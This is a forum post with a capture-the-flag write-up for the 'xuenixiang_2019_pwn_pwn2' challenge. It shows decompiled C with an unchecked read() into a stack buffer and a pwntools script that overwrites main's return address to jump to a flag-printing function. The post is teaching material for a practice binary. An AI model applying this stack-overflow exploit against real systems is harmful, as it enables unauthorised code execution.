kone 发表于 2020-11-12 12:11:20

xuenixiang_2019_pwn_pwn2 wp by kone

exp:
#-*- coding:utf-8 -*-

"""
// xuenixiang_2019_pwn_pwn2: https://www.xuenixiang.com/ctfexercise-competition-320.html

int get_shell_()
{
puts("tql~tql~tql~tql~tql~tql~tql");
puts("this is your flag!");
return system("cat flag");
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // BYREF

memset(s, 0, sizeof(s));
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
puts("say something?");
read(0, s, 0x100uLL);
puts("oh,that's so boring!");
return 0;
}
"""

from pwn import *
import sys

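# Target selection: one argument runs the binary locally under pwntools,
# two arguments connect to host/port. As posted, sys.argv was passed whole
# (the indices were lost somewhere between editor and forum), which makes
# both process() and remote() fail; the indices are restored here.
if len(sys.argv) == 2:
    p = process(sys.argv[1])
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
    sys.exit(1)

# Distance from the start of `s` to main()'s saved return address
# (sizeof(s) plus the 8-byte saved rbp). main() read()s 0x100 bytes into
# `s` with no bounds check, so everything past this offset lands on the
# return address. The value is the author's; confirm it with a cyclic
# pattern if the binary you have differs from the one in the post.
offset = 56

# Filler up to the return address, then the target address. 0x400751 is
# presumably get_shell_ (which runs system("cat flag")) — verify against
# the binary. The author writes it twice; presumably the extra slot keeps
# the stack 16-byte aligned for system() — confirm before relying on it.
# b'A' keeps the filler bytes like p64()'s output, so the concatenation
# also works under Python 3 (str + bytes raises TypeError there).
payload = b'A' * offset + p64(0x400751) * 2

p.sendafter("say something?", payload)
p.interactive()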

